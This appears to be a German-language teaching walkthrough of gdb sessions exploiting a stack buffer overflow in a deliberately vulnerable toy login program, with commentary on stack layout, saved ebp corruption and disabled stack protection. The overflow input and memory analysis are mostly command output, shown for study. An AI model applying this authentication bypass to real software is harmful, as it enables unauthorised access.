root@toshiba:/home/tomovic/hack# gcc -g -fno-stack-protector -z execstack -o auth_overflow2 auth_overflow2.c
root@toshiba:/home/tomovic/hack# gdb -q ./auth_overflow2
Reading symbols from /home/tomovic/hack/auth_overflow2...done.
(gdb) break 9
Haltepunkt 1 at 0x80484e9: file auth_overflow2.c, line 9.
(gdb) break 16
Haltepunkt 2 at 0x8048537: file auth_overflow2.c, line 16.
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/tomovic/hack/auth_overflow2 AAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 1, check_authentication (password=0xbffff8d5 'A' <repeats 28 times>)
at auth_overflow2.c:9
9 strcpy(password_buffer, password);
(gdb) x/s password_buffer
0xbffff6bc: "=\203\004\b\344S\374\267\002"
(gdb) x/x &auth_flag
0xbffff6cc: 0x00
(gdb) x/16xw &auth_flag
0xbffff6cc: 0x00000000 0x00000002 0xbffff794 0xbffff6f8
0xbffff6dc: 0x0804857c 0xbffff8d5 0x00000000 0x080485cb
0xbffff6ec: 0xb7fc5000 0x080485c0 0x00000000 0x00000000
0xbffff6fc: 0xb7e2f935 0x00000002 0xbffff794 0xbffff7a0
(gdb) c
Continuing.
Breakpoint 2, check_authentication (password=0xbffff8d5 'A' <repeats 28 times>)
at auth_overflow2.c:16
16 return auth_flag;
(gdb) x/s password_buffer
0xbffff6bc: 'A' <repeats 28 times>
(gdb) x/x &auth_flag
0xbffff6cc: 0x41
(gdb) x/16xw &auth_flag
0xbffff6cc: 0x41414141 0x41414141 0x41414141 0xbffff600
0xbffff6dc: 0x0804857c 0xbffff8d5 0x00000000 0x080485cb
0xbffff6ec: 0xb7fc5000 0x080485c0 0x00000000 0x00000000
0xbffff6fc: 0xb7e2f935 0x00000002 0xbffff794 0xbffff7a0
(gdb) x/xw password_buffer
0xbffff6bc: 0x41414141
(gdb) x/16xw password_buffer
0xbffff6bc: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff6cc: 0x41414141 0x41414141 0x41414141 0xbffff600
0xbffff6dc: 0x0804857c 0xbffff8d5 0x00000000 0x080485cb
0xbffff6ec: 0xb7fc5000 0x080485c0 0x00000000 0x00000000
(gdb) c
Continuing.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Program received signal SIGSEGV, Segmentation fault.
0x0000000a in ?? ()
(gdb) quit
A debugging session is active.
Inferior 1 [process 2597] will be killed.
Quit anyway? (y or n) y
root@toshiba:/home/tomovic/hack#
Anmerkung: Das Betriebssystem bestimmt die Anordnung der lokalen Variablen nicht – das tut der Compiler. In diesem Build liegt auth_flag bei -0xc(%ebp) (0xbffff6cc), also 16 Bytes oberhalb von password_buffer bei -0x1c(%ebp) (0xbffff6bc); der Überlauf überschreibt das Flag deshalb direkt, und der Exploit wird nicht ausgemerzt. Das klappt hier allerdings nur, weil das Programm mit -fno-stack-protector und -z execstack übersetzt wurde: Mit aktiviertem Stack-Protector würde gcc die Puffer normalerweise oberhalb der anderen lokalen Variablen anordnen und einen Canary vor die Rücksprungadresse legen, der beim Verlassen der Funktion geprüft wird. Der SIGSEGV nach „Access Granted.“ kommt vom abschließenden Nullbyte, das strcpy hinter die 28 'A' schreibt: Es trifft das niederwertigste Byte des gesicherten ebp (0xbffff6f8 wird zu 0xbffff600, siehe 0xbffff6d8 oben), sodass main beim Verlassen mit einem kaputten Frame-Pointer arbeitet. Ihr solltet das Training trotzdem machen, um ein Fingerspitzengefühl für den gdb zu bekommen.
root@toshiba:/home/tomovic/hack# gdb -q ./auth_overflow2
Reading symbols from /home/tomovic/hack/auth_overflow2...done.
(gdb) break 24
Haltepunkt 1 at 0x804856c: file auth_overflow2.c, line 24.
(gdb) break 9
Haltepunkt 2 at 0x80484e9: file auth_overflow2.c, line 9.
(gdb) break 16
Haltepunkt 3 at 0x8048537: file auth_overflow2.c, line 16.
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/tomovic/hack/auth_overflow2 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 1, main (argc=2, argv=0xbffff794) at auth_overflow2.c:24
24 if(check_authentication(argv[1])) {
(gdb) i r esp
esp 0xbffff6e0 0xbffff6e0
(gdb) x/32xw $esp
0xbffff6e0: 0xb7fed600 0x00000000 0x080485cb 0xb7fc5000
0xbffff6f0: 0x080485c0 0x00000000 0x00000000 0xb7e2f935
0xbffff700: 0x00000002 0xbffff794 0xbffff7a0 0xb7fff000
0xbffff710: 0x00000084 0x00000000 0xb7fdc858 0x00000003
0xbffff720: 0xbffff790 0xb7fc5000 0x00000000 0x00000000
0xbffff730: 0x00000000 0x2f139079 0x150c7469 0x00000000
0xbffff740: 0x00000000 0x00000000 0x00000002 0x080483e0
0xbffff750: 0x00000000 0xb7ff2990 0xb7e2f849 0xb7fff000
(gdb) c
Continuing.
Breakpoint 2, check_authentication (password=0xbffff8d2 'A' <repeats 30 times>) at auth_overflow2.c:9
9 strcpy(password_buffer, password);
(gdb) i r esp
esp 0xbffff6a0 0xbffff6a0
(gdb) x/32xw $esp
0xbffff6a0: 0xb7e22b98 0xb7fdc858 0xbffff8b0 0xb7fc5000
0xbffff6b0: 0x080485c0 0x080483e0 0x00000000 0x0804833d(2)
0xbffff6c0: 0xb7fc53e4 0x00000002 0x0804a000 0x00000000(1)
0xbffff6d0: 0x00000002 0xbffff794 0xbffff6f8 0x0804857c(3) <- Rücksprungadresse (main+64, liegt bei 0xbffff6dc = +0x4(%ebp))
0xbffff6e0: 0xbffff8d2(4) 0x00000000 0x080485cb 0xb7fc5000
0xbffff6f0: 0x080485c0 0x00000000 0x00000000 0xb7e2f935
0xbffff700: 0x00000002 0xbffff794 0xbffff7a0 0xb7fff000
0xbffff710: 0x00000084 0x00000000 0xb7fdc858 0x00000003
(gdb) x/s password_buffer
0xbffff6bc: "=\203\004\b\344S\374\267\002"
(gdb) x/x &auth_flag
0xbffff6cc: 0x00
(gdb)
0xbffff6cd: 0x00
(gdb) x/32xb 0xbffff6bc
0xbffff6bc: 0x3d 0x83 0x04 0x08 0xe4 0x53 0xfc 0xb7
0xbffff6c4: 0x02 0x00 0x00 0x00 0x00 0xa0 0x04 0x08
0xbffff6cc: 0x00 0x00 0x00 0x00 0x02 0x00 0x00 0x00
0xbffff6d4: 0x94 0xf7 0xff 0xbf 0xf8 0xf6 0xff 0xbf
(gdb) x/32xb 0xbffff8d2
0xbffff8d2: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff8da: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff8e2: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff8ea: 0x41 0x41 0x41 0x41 0x41 0x41 0x00 0x54
(gdb) disass main
Dump of assembler code for function main:
0x0804853c <+0>: push %ebp
0x0804853d <+1>: mov %esp,%ebp
0x0804853f <+3>: and $0xfffffff0,%esp
0x08048542 <+6>: sub $0x10,%esp
0x08048545 <+9>: cmpl $0x1,0x8(%ebp)
0x08048549 <+13>: jg 0x804856c <main+48>
0x0804854b <+15>: mov 0xc(%ebp),%eax
0x0804854e <+18>: mov (%eax),%eax
0x08048550 <+20>: mov %eax,0x4(%esp)
0x08048554 <+24>: movl $0x8048661,(%esp)
0x0804855b <+31>: call 0x8048380 <printf@plt>
0x08048560 <+36>: movl $0x0,(%esp)
0x08048567 <+43>: call 0x80483c0 <exit@plt>
0x0804856c <+48>: mov 0xc(%ebp),%eax
0x0804856f <+51>: add $0x4,%eax
0x08048572 <+54>: mov (%eax),%eax
0x08048574 <+56>: mov %eax,(%esp)
0x08048577 <+59>: call 0x80484dc <check_authentication>
0x0804857c <+64>: test %eax,%eax
0x0804857e <+66>: je 0x80485a6 <main+106>
0x08048580 <+68>: movl $0x8048677,(%esp)
0x08048587 <+75>: call 0x80483a0 <puts@plt>
0x0804858c <+80>: movl $0x8048694,(%esp)
0x08048593 <+87>: call 0x80483a0 <puts@plt>
0x08048598 <+92>: movl $0x80486aa,(%esp)
0x0804859f <+99>: call 0x80483a0 <puts@plt>
0x080485a4 <+104>: jmp 0x80485b2 <main+118>
0x080485a6 <+106>: movl $0x80486c6,(%esp)
0x080485ad <+113>: call 0x80483a0 <puts@plt>
0x080485b2 <+118>: leave
0x080485b3 <+119>: ret
End of assembler dump.
(gdb) disass check_authentication
Dump of assembler code for function check_authentication:
0x080484dc <+0>: push %ebp
0x080484dd <+1>: mov %esp,%ebp
0x080484df <+3>: sub $0x38,%esp
0x080484e2 <+6>: movl $0x0,-0xc(%ebp)
=> 0x080484e9 <+13>: mov 0x8(%ebp),%eax
0x080484ec <+16>: mov %eax,0x4(%esp)
0x080484f0 <+20>: lea -0x1c(%ebp),%eax
0x080484f3 <+23>: mov %eax,(%esp)
0x080484f6 <+26>: call 0x8048390 <strcpy@plt>
0x080484fb <+31>: movl $0x8048650,0x4(%esp)
0x08048503 <+39>: lea -0x1c(%ebp),%eax
0x08048506 <+42>: mov %eax,(%esp)
0x08048509 <+45>: call 0x8048370 <strcmp@plt>
0x0804850e <+50>: test %eax,%eax
0x08048510 <+52>: jne 0x8048519 <check_authentication+61>
0x08048512 <+54>: movl $0x1,-0xc(%ebp)
0x08048519 <+61>: movl $0x8048658,0x4(%esp)
0x08048521 <+69>: lea -0x1c(%ebp),%eax
0x08048524 <+72>: mov %eax,(%esp)
0x08048527 <+75>: call 0x8048370 <strcmp@plt>
0x0804852c <+80>: test %eax,%eax
0x0804852e <+82>: jne 0x8048537 <check_authentication+91>
0x08048530 <+84>: movl $0x1,-0xc(%ebp)
0x08048537 <+91>: mov -0xc(%ebp),%eax
0x0804853a <+94>: leave
0x0804853b <+95>: ret
End of assembler dump.
(gdb) p 0x38
$1 = 56
(gdb) p 0x38 +4 +4
$2 = 64
(gdb) c
Continuing.
Breakpoint 3, check_authentication (password=0xbffff8d2 'A' <repeats 30 times>) at auth_overflow2.c:16
16 return auth_flag;
(gdb) x/32xw $esp
0xbffff6a0: 0xbffff6bc 0x08048658 0xbffff8b0 0xb7fc5000
0xbffff6b0: 0x080485c0 0x080483e0 0x00000000 0x41414141
0xbffff6c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff6d0: 0x41414141 0x41414141 0xbf004141 0x0804857c <-- Rücksprungadresse (unverändert; das gesicherte ebp davor wurde zu 0xbf004141)
0xbffff6e0: 0xbffff8d2 0x00000000 0x080485cb 0xb7fc5000
0xbffff6f0: 0x080485c0 0x00000000 0x00000000 0xb7e2f935
0xbffff700: 0x00000002 0xbffff794 0xbffff7a0 0xb7fff000
0xbffff710: 0x00000084 0x00000000 0xb7fdc858 0x00000003
(gdb) c
Continuing.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Program received signal SIGSEGV, Segmentation fault.
main (argc=<Fehler beim Lesen der Variable: Cannot access memory at address 0xbf004149>,
argv=<Fehler beim Lesen der Variable: Cannot access memory at address 0xbf00414d>) at auth_overflow2.c:31
31 }
Es ist wirklich keine Schande, wenn ihr die Adressverwaltung nicht auf Anhieb verstanden habt. Zur Orientierung: password_buffer liegt bei 0xbffff6bc (-0x1c(%ebp)), die Rücksprungadresse 0x0804857c bei 0xbffff6dc (+0x4(%ebp)) – der Abstand beträgt also 0x20 = 32 Bytes, nicht die oben berechneten 64 (0x38 + 4 + 4 ist die gesamte Frame-Größe samt gesichertem ebp und Rücksprungadresse). Mit 30 Bytes Eingabe landet das abschließende Nullbyte von strcpy im gesicherten ebp bei 0xbffff6d8 (0xbffff6f8 wird zu 0xbf004141), weshalb main nach dem „Access Granted.“ beim Verlassen mit SIGSEGV abstürzt. Macht erst weiter, wenn ihr den Exploit 100 % verstanden habt!